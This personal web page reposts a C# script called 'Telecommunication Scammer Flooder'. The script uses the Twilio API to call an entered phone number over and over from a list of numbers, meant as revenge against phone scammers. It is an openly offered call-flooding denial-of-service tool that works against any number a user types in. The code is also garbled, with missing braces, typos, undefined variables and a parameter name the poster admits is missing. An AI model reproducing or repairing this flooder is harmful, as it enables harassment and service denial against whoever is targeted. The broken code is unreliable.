Programmer fights phone scammers

(Links each open in a new tab/window.)

Note: This page was formerly "Reddit worth saving", which has been moved to Reddit worth saving


Programmer writes script that calls Phone Scammers 28 times a second causing service denial preventing future scams page v=EzedMdx6QG4(link is external)

[Reddit discussion](link is external)

Donation link for video's creator to help continue the great work is external)

Vote with your wallet please. Thank you kindly. Love Karma.

The Code - NEW

Someone else has posted the Script Code on GitHub at is external)

The Code - My original post - Deprecated

Credit for the code below, created from the video,
is due someone else, not me.

I copied it from his (or her) posting at page: is external)
...although I did figure out the first
of two missing words from that page.

Note: One word is still missing below
at the point at which you find the phrase:
/*not sure what this first word is*/

If I had to guess, I would say it should be:
...but that is only a wild guess.


using System;
using System.Collections.Generic;
using System.Linq;
using System.Diagnostics;
using System.Text
using System.Threading.Tasks;
using Twilio

namespace CallBomber
	class Program
		public static string accountsid = "***********";
		public static string authtoken = "*********";
		public static List(string) numbers = new List(string){new string() {"+15555555555", "+16665555555"}};
		public static List(string) NumbersInUse = new List(string)();
		public static string NumToCall = "";
		static void Main(string[] args)
			Console.WriteLine(" -- Telecommunication Scammer Flooder -- v1.0");
			Console.WriteLine("Enter the number to flood(+1 MUST BE IN FRONT!)");
			NumToCall = Console.ReadLine();
			Console.WrtieLine("Press Enter to start the flooder, Otherwise exit the application right now...")
			TwilioClient.Init(accountsid, authtoken);
			var count = 1;
				Console.WriteLine("Starting Call Batch " + count.ToString() + " (" + numbers.Count | " Nums.)"
				foreach (string num in numbers)
		static void Call(string FromNumber)
				var call = CallResource.Create(
					to: new PhoneNumber(NumToCall),
					/*not sure what this first word is*/ new PhoneNumber(FromNumber),
					record: true,
				Console.WriteLine(string.Format($"Started call to: {callto}, from: {FromNumber}"));
			catch(Exception Ex)
				Console.WriteLine(string.Format($"Error on numner {FromNumber}: {e.Message}"));

Note: This page was formerly "Reddit worth saving", which has been moved to Reddit worth saving